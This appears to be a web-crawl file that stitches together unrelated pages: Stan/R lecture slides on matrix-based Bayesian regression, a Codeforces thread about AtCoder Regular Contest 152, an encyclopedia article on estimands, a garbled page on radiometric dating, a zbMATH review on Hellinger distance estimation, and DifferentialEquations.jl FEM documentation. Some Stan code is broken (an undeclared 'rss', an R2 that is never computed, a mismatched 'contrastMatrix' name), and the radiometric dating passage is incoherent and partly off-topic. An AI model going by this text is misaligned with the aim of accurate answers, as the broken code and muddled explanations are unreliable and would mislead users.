• $\textbf{WeightLB}$ is the vector of outcomes (size $N \times 1$)
• $\textbf{X}$ is the model (predictor) matrix (size $N \times P$ for $P-1$ predictors)
• $\boldsymbol{\beta}$ is the coefficents vector (size $P \times 1$)
• $\textbf{e}$ is the vector of residuals (size $N \times 1$)
## Example: Predicted Values
P=6
beta = matrix(data = runif(n = 6, min = 0, max = 10), nrow = P, ncol = 1)
X = model.matrix(FullModelFormula, data=DietData)
X %*% beta # R uses %*% for matrix products
[,1]
1 3.5041870
2 4.2407897
3 4.9773925
4 5.7139952
5 6.4505980
6 3.1358856
7 4.6090911
8 5.1615432
9 5.1615432
10 6.0822966
11 -1.5318296
12 5.4390386
13 12.4099067
14 19.3807748
15 26.3516430
16 -5.0172636
17 8.9244726
18 14.1526237
19 14.1526237
20 22.8662089
21 -25.4129828
22 -5.4996766
23 14.4136295
24 34.3269356
25 54.2402417
26 -35.3696358
27 -0.5213501
28 24.3702826
29 29.3486091
30 64.1968948
## Syntax Changes: Data Section
Old Syntax Without Matrices
data {
int<lower=0> N;
vector[N] weightLB;
vector[N] height60IN;
vector[N] group2;
vector[N] group3;
vector[N] heightXgroup2;
vector[N] heightXgroup3;
}
New Syntax With Matrices
data {
int<lower=0> N; // number of observations
int<lower=0> P; // number of predictors (plus column for intercept)
matrix[N, P] X; // model.matrix() from R
vector[N] y; // outcome
vector[P] meanBeta; // prior mean vector for coefficients
matrix[P, P] covBeta; // prior covariance matrix for coefficients
real sigmaRate; // prior rate parameter for residual standard deviation
}
## Syntax Changes: Parameters Section
Old Syntax Without Matrices
parameters {
real beta0;
real betaHeight;
real betaGroup2;
real betaGroup3;
real betaHxG2;
real betaHxG3;
real<lower=0> sigma;
}
New Syntax With Matrices
parameters {
vector[P] beta; // vector of coefficients for Beta
real<lower=0> sigma; // residual standard deviation
}
## Defining Prior Distributions
Previously, we defined a normal prior distribution for each regression coefficient
• Univariate priors – univariate normal distribution
• Each parameter had a prior that was independent of the other parameters
When combining all parameters into a vector, a natural extension is a multivariate normal distribution
• https://en.wikipedia.org/wiki/Multivariate_normal_distribution
• Mean vector (meanBeta; size $P \times 1$)
• Put all prior means for these coefficients into a vector from R
• Covariance matrix (covBeta; size $P \times P$)
• Put all prior variances (prior $SD^2$) into the diagonal
• With zeros for off diagonal, the MVN prior is equivalent to the set of independent univariate normal priors
## Syntax Changes: Model Section
Old Syntax Without Matrices
model {
beta0 ~ normal(0,1);
betaHeight ~ normal(0,1);
betaGroup2 ~ normal(0,1);
betaGroup3 ~ normal(0,1);
betaHxG2 ~ normal(0,1);
betaHxG3 ~ normal(0,1);
sigma ~ exponential(.1); // prior for sigma
weightLB ~ normal(
beta0 + betaHeight * height60IN + betaGroup2 * group2 +
betaGroup3 * group3 + betaHxG2 *heightXgroup2 +
betaHxG3 * heightXgroup3, sigma);
}
New Syntax With Matrices
model {
beta ~ multi_normal(meanBeta, covBeta); // prior for coefficients
sigma ~ exponential(sigmaRate); // prior for sigma
y ~ normal(X*beta, sigma); // linear model
}
See: Example Syntax in R File
## Summary of Changes
• With matrices, there is less syntax to write
• Model is equivalent
• Output, however, is not labeled with respect to parameters
• May have to label output
# A tibble: 8 × 10
variable mean median sd mad q5 q95 rhat ess_bulk ess_tail
<chr> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl>
1 lp__ -78.0 -77.7 2.09 1.93 -82.0 -75.3 1.00 2840. 4327.
2 beta[1] 147. 147. 3.17 3.09 142. 152. 1.00 3044. 4196.
3 beta[2] -0.349 -0.352 0.485 0.475 -1.15 0.455 1.00 3258. 4432.
4 beta[3] -24.0 -24.0 4.46 4.40 -31.3 -16.6 1.00 3340. 4801.
5 beta[4] 81.5 81.5 4.22 4.14 74.6 88.5 1.00 3438. 4785.
6 beta[5] 2.45 2.45 0.683 0.680 1.33 3.54 1.00 3579. 4813.
7 beta[6] 3.53 3.53 0.640 0.630 2.48 4.58 1.00 3550. 4266.
8 sigma 8.24 8.10 1.22 1.16 6.51 10.4 1.00 4444. 4860.
## Computing Functions of Parameters
• Often, we need to compute some linear or non-linear function of parameters in a linear model
• Missing effects (i.e., slope for Diet Group 2)
• Simple slopes
• $R^2$
• In non-Bayesian analyses, these are often formed with the point estimates of parameters
• For Bayesian analyses, however, we will seek to build the posterior distribution for any function of the parameters
• This means applying the function to all posterior samples
## Example: Need Slope for Diet Group 2
Recall our model:
$\text{WeightLB}_p = \beta_0 + \beta_1\text{HeightIN}_p + \beta_2 \text{Group2}_p + \beta_3 \text{Group3}_p + \beta_4\text{HeightIN}_p\text{Group2}_p +$
$\beta_5\text{HeightIN}_p\text{Group3}_p + e_p$
Here, $\beta_1$ is the change in $\text{WeightLB}_p$ per one-unit change in $\text{HeightIN}_p$ for a person in Diet Group 1 (i.e. _p and $\text{Group3}_p=0$)
Question: What is the slope for Diet Group 2?
• To answer, we need to first form the model when $\text{Group2}_p = 1$:
$\text{WeightLB}_p = \beta_0 + \beta_1\text{HeightIN}_p + \beta_2 + \beta_4\text{HeightIN}_p + e_p$
• Next, we rearrange terms that involve $\text{HeightIN}_p$:
$\text{WeightLB}_p = (\beta_0 + \beta_2) + (\beta_1 + \beta_4)\text{HeightIN}_p + e_p$
• From here, we can see the slope for Diet Group 2 is $(\beta_1 + \beta_4)$
• Also, the intercept for Diet Group 2 is $(\beta_0 + \beta_2)$
## Computing Slope for Diet Group 2
Our task: Create posterior distribution for Diet Group 2
• We must do so for each iteration we’ve kept from our MCMC chain
• A somewhat tedious way to do this is after using Stan
model05_Samples$summary() # A tibble: 8 × 10 variable mean median sd mad q5 q95 rhat ess_bulk ess_tail <chr> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> 1 lp__ -78.0 -77.7 2.09 1.93 -82.0 -75.3 1.00 2840. 4327. 2 beta[1] 147. 147. 3.17 3.09 142. 152. 1.00 3044. 4196. 3 beta[2] -0.349 -0.352 0.485 0.475 -1.15 0.455 1.00 3258. 4432. 4 beta[3] -24.0 -24.0 4.46 4.40 -31.3 -16.6 1.00 3340. 4801. 5 beta[4] 81.5 81.5 4.22 4.14 74.6 88.5 1.00 3438. 4785. 6 beta[5] 2.45 2.45 0.683 0.680 1.33 3.54 1.00 3579. 4813. 7 beta[6] 3.53 3.53 0.640 0.630 2.48 4.58 1.00 3550. 4266. 8 sigma 8.24 8.10 1.22 1.16 6.51 10.4 1.00 4444. 4860. slopeG2 = model05_Samples$draws("beta[2]") + model05_Samples$draws("beta[5]") summary(slopeG2) # A tibble: 1 × 10 variable mean median sd mad q5 q95 rhat ess_bulk ess_tail <chr> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> 1 beta[2] 2.10 2.10 0.481 0.463 1.31 2.88 1.00 7569. 6251. ## Computing the Slope Within Stan Stan can compute these values for us–with the “generated quantities” section of the syntax generated quantities{ real slopeG2; slopeG2 = betaHeight + betaHxG2; } The generated quantities block computes values that do not affect the posterior distributions of the parameters–they are computed after the sampling from each iteration • The values are then added to the Stan object and can be seen in the summary • They can also be plotted using the bayesplot package model04b_Samples$summary()
# A tibble: 9 × 10
variable mean median sd mad q5 q95 rhat ess_bulk
<chr> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl>
1 lp__ -150. -149. 2.05 1.90 -153. -147. 1.00 1813.
2 beta0 0.214 0.207 0.997 0.993 -1.42 1.86 1.00 4119.
3 betaHeight 12.1 12.0 3.54 3.45 6.33 17.9 1.00 2311.
4 betaGroup2 123. 123. 28.2 28.0 76.3 169. 1.00 3443.
5 betaGroup3 229. 229. 24.7 24.2 189. 269. 1.00 4005.
6 betaHxG2 -9.96 -9.93 5.50 5.30 -19.1 -1.01 1.00 2370.
7 betaHxG3 -8.93 -8.88 5.17 5.16 -17.3 -0.531 1.00 2593.
8 sigma 71.8 71.0 8.90 8.48 58.8 87.9 1.00 3471.
9 slopeG2 2.11 2.08 4.29 4.24 -4.96 9.10 1.00 3711.
# … with 1 more variable: ess_tail <dbl>
## Computing the Slope with Matrices
To put this same method to use with our matrix syntax, we can form a contrast matrix
• Contrasts are linear combinations of parameters
• You may have used these in R using the glht package
For us, we form a contrast matrix that is size $C \times P$ where C are the number of contrasts
• The entries of this matrix are the values that multiply the coefficients
• For $(\beta_1 + \beta_4)$ this would be
• A one in the corresponding entry for $\beta_1$
• A one in the corresponding entry for $\beta_4$
• Zeros elsewhere
• $\textbf{C} = \left[ \begin{array}{cccccc} 0 & 1 & 0 & 0 & 1 & 0 \\ \end{array} \right]$
The contract matrix then multipies the coefficents vector to form the values:
$\textbf{C} \boldsymbol{\beta}$
## Contrasts in Stan
We can change our Stan code to import a contrast matrix and use it in generated quantities:
data {
int<lower=0> N; // number of observations
int<lower=0> P; // number of predictors (plus column for intercept)
matrix[N, P] X; // model.matrix() from R
vector[N] y; // outcome
vector[P] meanBeta; // prior mean vector for coefficients
matrix[P, P] covBeta; // prior covariance matrix for coefficients
real sigmaRate; // prior rate parameter for residual standard deviation
int<lower=0> nContrasts;
matrix[nContrasts,P] contrast; // contrast matrix for additional effects
}
The generated quantities would then become:
generated quantities {
vector[nContrasts] contrasts;
contrasts = contrastMatrix*beta;
}
See example syntax for a full demonstration
## Computing $R^2$
We can use the generated quantities section to build a posterior distribution for $R^2$
There are several formulas for $R^2$, we will use the following:
$R^2 = 1 - \frac{RSS}{TSS} = 1 - \frac{\sum_{p=1}^{N}\left(y_p - \hat{y}_p\right)^2}{\sum_{p=1}^{N}\left(y_p - \bar{y}_p\right)^2}$
Where:
• RSS is the regression sum of squares
• TSS is the total sum of squares
• $\hat{y} = \textbf{X}\boldsymbol{\beta}$
• $\bar{y} = \sum_{p=1}^{N}\frac{y_p}{N}$
Notice: RSS depends on sampled parameters–so we will use this to build our posterior distribution for $R^2$
## Computing $R^2$ in Stan
The generated quantities block can do everything we need to compute $R^2$
generated quantities {
vector[nContrasts] heightSlopeG2;
heightSlopeG2 = contrast*beta;
{ // anything in these brackets will not appear in summary
vector[N] pred;
pred = X*beta;
rss = dot_self(y-pred); // dot_self is a stan function
}
real R2;
}
See the example syntax for a demonstration
## Wrapping Up
Today we further added to our Bayesian toolset:
• How to make Stan use less syntax using matrices
• How to form posterior distributions for functions of parameters
We will use both of these features in psychometric models
## Up Next
We have one more lecture on linear models that will introduce
• Methods for relative model comparisons
• Methods for checking the absolute fit of a model
Then all things we have discussed to this point will be used in our psychometric models | 2022-12-06 01:09:21 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 3, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6067776083946228, "perplexity": 8644.904545323938}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711064.71/warc/CC-MAIN-20221205232822-20221206022822-00414.warc.gz"} |
https://codeforces.com/blog/entry/109206 | maroonrk's blog
By maroonrk, history, 3 months ago,
We will hold AtCoder Regular Contest 152.
The point values will be 400-500-600-700-800-1000.
We are looking forward to your participation!
• +109
» 3 months ago, # | 0 Will participate. Give me 2 Dan.
• » » 3 months ago, # ^ | +8 May not get 2 Dan, but the problems are very interesting!!! Thank you, writer!!!
• » » » 3 months ago, # ^ | 0 I'm so proud that I've solved ABD and I'm sure to get positive delta :)
» 3 months ago, # | -8 rp++!
» 3 months ago, # | +13 What the hell are the samples? They're so weak
» 3 months ago, # | ← Rev. 2 → -15 I'm so sad right now. Here is why. WhyTried approaching A by constructing the worst case (every gap is one of size 1). Here is the result.
• » » 3 months ago, # ^ | 0 Sympathetic
» 3 months ago, # | 0 Any hints for C?
• » » 3 months ago, # ^ | 0 +1
• » » 3 months ago, # ^ | 0 I think the idea behind problem C is quite inspiring, although I still can not understand the editorial. I have realized that selecting some value s means a mirror symmetry, but can't go further. Waiting for some other hints too.
» 3 months ago, # | +24 What a weird contest. Difficulty to me was A
• » » 3 months ago, # ^ | +16 E is more of a statement parsing problem but in a good sense. I don't think it's an easy problem for most participants because you need good skills in constructing math models and understanding what is important.
• » » 2 months ago, # ^ | +28 B is quite easily solvable if you notice that if they need to pass each other twice, they might as well start at the point where they passed each other for the first time.
» 3 months ago, # | +5 That was so hard that I only solved A. :(
• » » 3 months ago, # ^ | 0 and then 1233 -> 1216
• » » » 3 months ago, # ^ | 0 for me 1256 -> 1206 :pain:I were also able to make A only :pain:
» 3 months ago, # | ← Rev. 2 → -39 What the hell was that ??? I'm 1667 Elo on codechef and 1132 Elo on codeforces and unable to solve problem A. It's ridiculous.And Editorial provide no explanation of the formula.I basically solve nothing and learn nothing.I Will no more do Regular Contest for a long long time...
• » » 3 months ago, # ^ | +12 Go and do more ABC problems. They are much easier.When you are likely to solve problem E~F in ABC, then back to ARC. I am sure you can enjoy the problems.
» 3 months ago, # | -8 Can someone please explain problem B approach ?? I didn't get clearly the idea even with the tutorial.
» 3 months ago, # | 0 Can anyone explain what needed to be done in problem A? and why was it to be done this way!?I don't understand the editorial to a good extent, maybe someone can help here.
• » » 3 months ago, # ^ | ← Rev. 3 → 0 Ordering of the group matters like they will come in the order given there so you just need to let the group sit like upcoming can't seat so here only two kind of group make exists (i.e. size of 1 and 2) so group of size 1 can sit anywhere, ans can be "NO" only when a group of size 2 arrives! with some condition.So we just need to let groups sit so that it can occupy one or two more space than their own sizes which will lead to not make a sit for upcomers.Remember group of 2 only will face difficulty always!My Code
• » » 3 months ago, # ^ | 0 My approach is to simulate the worst case that each arrived group will pick a position one unit away from previous group if possible. i.e. x group1 x group2 x group3 ... where x is empty seats.
» 3 months ago, # | +47 Thank you for your participation!
» 3 months ago, # | 0 Can anyone prove the solution of B problem, I solved but I can't prove it.
» 3 months ago, # | ← Rev. 2 → 0 why is this not working my approch -> https://atcoder.jp/contests/arc152/submissions/36673139
» 3 months ago, # | 0 Can someone explain C in detail? I can't understand the solution...
• » » 2 months ago, # ^ | +32 Consider a sorted sequence and arbitrary two operations with $s_1$ and $s_2$. The sequence changes by $+2(s_1-s_2)$, the order of elements is unchanged. Here $s_1 = a_p$ and $s_2 = 2s_1-a_r$ for some $p,r$, so $2(s_1-s_2) = 2(a_r-a_p)$. Obviously then, if $g$ is the GCD of all elements, then their remainders modulo $2g$ can't change. In an even number of operations, it's clear that the smallest possible value of the first element is $a_1$ modulo $2g$.The remainders modulo $2g$ won't change in one operation either, since $2a_p-a_i = 2(a_p-a_i)+a_i \equiv a_i$ modulo $2g$. If the number of operations is odd, all that matters is that the order of elements in the sorted sequence is reversed, so the smallest possible value of the first element could be $a_N$ modulo $2g$ instead. (Since $g$ is the GCD of differences, each $a_i = b_i g + r$, only parities of $b_1, b_N$ matter.)Finally, it's always possible to construct a sequence in which the smallest element is $a_1 \% 2g$ by first adding and then subtracting some 2*differences, see Bezout's identity. The rule on non-negative elements isn't broken then.
• » » » 2 months ago, # ^ | 0 got it. thx.
» 3 months ago, # | -10 Why this is wrong for B? constexpr int N = 200005; int a[N]; set s; signed main(){ int n, l; cin>>n>>l; for(int i = 1; i <= n; i++) cin>>a[i]; int ans = inf; for(int i = 1; i <= n; i++){ s.insert(l - a[i]); } int mi = inf; for(int i = 1; i <= n; i++){ set::iterator it=s.lower_bound(a[i]); set::iterator it2=it; if(it!=s.begin()) it--; if(it2==s.end()) it2--; mi = min(mi, abs(a[i] - *it)); mi = min(mi, abs(a[i] - *it2)); } ans = min(ans, mi * 2 + l * 2); cout<
• » » 2 months ago, # ^ | 0 Why are you --it2? I think you should just leave it. AC code Linkk
• » » 2 months ago, # ^ | 0 The problem is my inf is not big enough.
» 2 months ago, # | 0 in problem A "Seat Occupation"I see that my submission 36675947 send during contest was correct except "Yes" (resp; "No") replace by "yes" (resp. "no").If the evaluatiuon is CASE SENSITIVE, it should clarify in statement.CodeChef and CodeForces are not case sensitive.Sorry, but i can only blame the author. submission with wrong case: https://atcoder.jp/contests/arc152/submissions/36675947submission with correct case: https://atcoder.jp/contests/arc152/submissions/37023059
» 5 weeks ago, # | 0 It seems that output values for the first 23 tests for problem D in dropbox (here) are all empty. | 2023-02-05 23:49:05 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3130354881286621, "perplexity": 1781.0430964077811}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500294.64/warc/CC-MAIN-20230205224620-20230206014620-00177.warc.gz"} |
https://handwiki.org/wiki/Estimand | # Estimand
An estimand is a quantity that is to be estimated in a statistical analysis.[1] The term is used to more clearly distinguish the target of inference from the method used to obtain an approximation of this target (i.e., the estimator) and the specific value obtained from a given method and dataset (i.e., the estimate).[2] For instance, a normally distributed random variable $\displaystyle{ X }$ has two defining parameters, its mean $\displaystyle{ \mu }$ and variance $\displaystyle{ \sigma^{2} }$. A variance estimator: $\displaystyle{ s^{2} = \sum_{i=1}^{n} \left. \left( x_{i} - \bar{x} \right)^{2} \right/ (n-1) }$,
yields an estimate of 7 for a data set $\displaystyle{ x = \left\{ 2, 3, 7 \right\} }$; then $\displaystyle{ s^{2} }$ is called an estimator of $\displaystyle{ \sigma^{2} }$, and $\displaystyle{ \sigma^{2} }$ is called the estimand.
## Definition
In relation to an Estimator, an estimand is the outcome of different treatments of interest. It can formally be thought of as any quantity that is to be estimated in any type of experiment.[3]
## Overview
An estimand is closely linked to the purpose or objective of an analysis. It describes what is to be estimated based on the question of interest.[4] This is in contrast to an estimator, which defines the specific rule according to which the estimand is to be estimated. While the estimand will often be free of the specific assumptions e.g. regarding missing data, such assumption will typically have to be made when defining the specific estimator. For this reason, it is logical to conduct sensitivity analyses using different estimators for the same estimand, in order to test the robustness of inference to different assumptions.[5]
According to Ian Lundberg, Rebecca Johnson, and Brandon M. Stewart, quantitative studies frequently fail to define their estimand.[1] This is problematic because it becomes impossible for the reader to know whether the statistical procedures in a study are appropriate unless they know the estimand.[1]
## Examples
If our question of interest is whether instituting an intervention such as a vaccination campaign in a defined population in a country would reduce the number of deaths in that population in that country, then our estimand will be some measure of risk reduction (e.g. it could be a hazard ratio, or a risk ratio over one year) that would describe the effect of starting a vaccination campaign. We may have data from a clinical trial available to estimate the estimand. In judging the effect on the population level, we will have to reflect that some people may refuse to be vaccinated so that excluding those in the clinical trial from the analysis, who refused to be vaccinated may be inappropriate. Furthermore, we may not know the survival status of all those who were vaccinated, so that assumptions will have to be made in this regard in order to define an estimator.
One possible estimator for obtaining a specific estimate might be a hazard ratio based on a survival analysis that assumes a particular survival distribution conducted on all subjects to whom the intervention was offered, treating those who were lost to follow-up to be right-censored under random censorship. It might be that the trial population differs from the population, on which the vaccination campaign would be conducted, in which case this might also have to be taken into account. An alternative estimator used in a sensitivity analysis might assume that people, who were not followed for their vital status to the end of the trial, may be more likely to have died by a certain amount.
### Epidemiological
In establishing clinical trials, often practitioners want to focus on measuring the effects of their treatments on a population of individuals. These aforementioned clinical settings are built with ideal scenarios, far removed from any intercurrent events. However, as this will often not be the case in reality, variability needs to taken into account during the planning and execution of these trials.[6] By building foundational objectives around the idea of the estimand framework in clinical medicine, it allows practitioners to align the clinical study objective with the study design, endpoint, and analysis to improve study planning and the interpretation of analysis..[7] Essentially meaning that the estimand provides a way to explicitly state how these intercurrent events will be dealt with in achieving the objective of the treatment in question.
## ICH
On October 22, 2014, the International Council for Harmonisation of Technical Requirements for Pharmaceuticals for Human Use (ICH) produced a final concept paper titled Choosing Appropriate Estimands and Defining Sensitivity Analyses in Clinical Trials as an addendum to their E9 guidance.[8] On 16 October 2017 ICH announced that it had published the draft addendum on defining appropriate estimands for a clinical trial/sensitivity analyses for consultation.[9][10] The final addendum to the ICH E9 guidance was released on November 20, 2019.[11]
By providing a structured framework for translating the objectives of a clinical trial to a matching trial design, conduct and analysis ICH aims to improve discussions between pharmaceutical companies and regulators authorities on drug development programs. The ultimate goal is to make sure that clinical trials provide clearly defined information on the effects of the studied medicines.[10]
## References
1. Lundberg, Ian; Johnson, Rebecca; Stewart, Brandon M. (2021). "What Is Your Estimand? Defining the Target Quantity Connects Statistical Evidence to Theory" (in en). American Sociological Review 86 (3): 532–565. doi:10.1177/00031224211004187. ISSN 0003-1224.
2. Mosteller, F.; Tukey, J. W. (1987). "Data Analysis, including Statistics". The Collected Works of John W. Tukey: Philosophy and Principles of Data Analysis 1965–1986. 4. CRC Press. pp. 601–720 [p. 633]. ISBN 0-534-05101-4.
3. Lawrance, Rachael; Degtyarev, Evgeny; Griffiths, Philip; Trask, Peter; Lau, Helen; D’Alessio, Denise; Griebsch, Ingolf; Wallenstein, Gudrun et al. (24 August 2020). "What is an estimand & how does it relate to quantifying the effect of treatment on patient-reported quality of life outcomes in clinical trials?". Springer. pp. 68. doi:10.1186/s41687-020-00218-5.
4. National Research Council (2010). The Prevention and Treatment of Missing Data in Clinical Trials. Panel on Handling Missing Data in Clinical Trials. Committee on National Statistics, Division of Behavioral and Social Sciences and Education.. Washington, DC: The National Academies Press.
5. International Conference on Harmonisation of Technical Requirements for Registration of Pharmaceuticals for Human Use (2014). Draft (final) concept paper on choosing appropriate estimands and definining sensitivity analyses in confirmatory clinical trials.
6. Team, Statistical Consultancy. "Estimands – What you need to know" (in en-us).
7. International Council for Harmonisation of Technical Requirements for Pharmaceuticals for Human Use (2019). "ICH E9 Addendum on Estimands". | 2022-10-02 12:23:07 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6235918402671814, "perplexity": 1480.7779832792341}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00226.warc.gz"} |
http://refereed.ru/radiometric-dating-calculus-equations-26638.html | # Radiometric dating calculus equations
The last figure I heard was that there are currently eight nuclear subs on our ocean floors. It doesn't work for sea creatures and other things that are under water. Then they measure how much is left in the specimen when they find it. It comes from cosmic rays that rain down on the earth (and us) from outer space.Radiocarbon dating can be used on samples of bone, cloth, wood and plant fibers.The half-life of a radioactive isotope describes the amount of time that it takes half of the isotope in a sample to decay.
The exponential decay formula is given by: $$m(t) = m_0 e^$$ where $\displaystyle r = \frac$, $h$ = half-life of Carbon-14 = 30$years,$m_0\$ is of the initial mass of the radioactive substance.
It’s the time it takes for a batch of radioactive atoms to decay away, i.e. We can relate $$\tau_$$ to $$\lambda$$ easily using the formula derived above.
We just say we start with $$N_0=100$$ atoms and calculate the $$t$$ it takes for this to drop to $$N=50$$.
WARNING: there is a little bit of calculus involved.
We start by noting that the speed of radioactive decays occurring in a sample is proportional to the number of radioactive atoms in the sample. If you had 10 jumping beans and saw one jump every second, you’d expect to see about 10 jumps per second if you had 100. | 2019-01-22 09:59:06 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 2, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8776521682739258, "perplexity": 462.6843643932106}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583835626.56/warc/CC-MAIN-20190122095409-20190122121409-00446.warc.gz"} |
https://zbmath.org/?q=an%3A0807.62030 | ## Efficiency versus robustness: The case for minimum Hellinger distance and related methods.(English)Zbl 0807.62030
Summary: It is shown how and why the influence curve poorly measures the robustness properties of minimum Hellinger distance estimation. Rather, for this and related forms of estimation, there is another function, the residual adjustment function, that carries the relevant information about the trade-off between efficiency and robustness. It is demonstrated that this function determines various second-order measures of efficiency and robustness through a scalar measure called the estimation curvature. The function is also shown to determine the breakdown properties of the estimators through its tail behavior.
A 50% breakdown result is given. It is shown how to create flexible classes of estimation methods in the spirit of $$M$$-estimation, but with first-order efficiency (or even second-order efficiency) at the chosen model, 50% breakdown and a minimum distance interpretation.
### MSC:
62F35 Robustness and adaptive procedures (parametric inference) 62F12 Asymptotic properties of parametric estimators
Full Text: | 2022-08-08 22:24:16 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5540404319763184, "perplexity": 1071.3424010374501}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570879.1/warc/CC-MAIN-20220808213349-20220809003349-00710.warc.gz"} |
http://docs.juliadiffeq.org/latest/types/fem_types.html | FEM Problems
# FEM Problems
Below are the definitions of the types which specify problems. Some general notes are:
• (t,x) vs (t,x,y): Mathematically one normally specifies equations in 2D as $f(t,x,y)$. However, in this code we use x as a vector. Thus you can think of $x$=x[:,1] and $y$=x[:,2]. Thus input equations are of the form f(x,t) no matter the dimension. If time is not included in the problem (for example, a Poisson equation problem), then we use f(x). An example is the equation $u(x,y)= sin(2πx)cos(2πy)/(8π^2)$ would be specified as sol(x) = sin(2π.*x[:,1]).*cos(2π.*x[:,2])/(8π*π).
• Linearity: If the equation has a linear term, they are specified with functions f(t,x). If it is nonlinear, it is specified with functions f(t,x,u). The boundary conditions are always (t,x)
• Stochastic: By default the equation is deterministic. For each equation, one can specify a σ term which adds a stochastic $σ(t,x,u)dW_t$ term to the equation (or with $σ(t,x)dW_t$ if linear, must match f). $dW_t$ corresponds to the type of noise which is chosen. By default this is space-time Gaussian white noise.
## Poisson Equation Problem
Wraps the data that defines a 2D linear Poisson equation problem:
$-Δu = f$
with bounday conditions gD on the Dirichlet boundary and gN on the Neumann boundary. Linearity is determined by whether the forcing function f is a function of one variable (x) or two (u,x) (with x=[:,1] and y=[:,2]).
If the keyword σ is given, then this wraps the data that defines a 2D stochastic heat equation
$-Δu = f + σdW$
### Constructors
PoissonProblem(f,analytic,Du,mesh): Defines the Dirichlet problem with analytical solution analytic, solution gradient Du = [u_x,u_y], and forcing function f
PoissonProblem(u0,f,mesh): Defines the problem with initial value u0 (as a function) and f. If your initial data is a vector, wrap it as u0(x) = vector.
Note: If all functions are of (x), then the program assumes it's linear. Write your functions using the math to program syntax translation: $x$ = x[:,1] and $y$ = x[:,2]. Use f=f(u,x) and σ=σ(u,x) (if specified) for nonlinear problems (with the boundary conditions still (x)). Systems of equations can be specified with u_i = u[:,i] as the ith variable. See the example problems for more help.
### Keyword Arguments
